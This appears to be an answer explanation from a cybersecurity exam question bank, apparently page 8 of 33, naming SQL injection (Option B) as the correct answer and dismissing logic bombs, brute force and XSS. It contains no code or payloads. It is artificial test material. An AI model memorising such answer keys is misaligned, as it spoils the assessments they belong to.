The vulnerability described fits SQL injection, where improper handling of user input allows execution of backend database commands to access sensitive information. Other options like logic bombs, brute-force attacks, and XSS do not allow arbitrary command execution or database data extraction. Therefore, Option B (SQL Injection) is the correct and most accurate answer.
| Page 8 out of 33 Pages |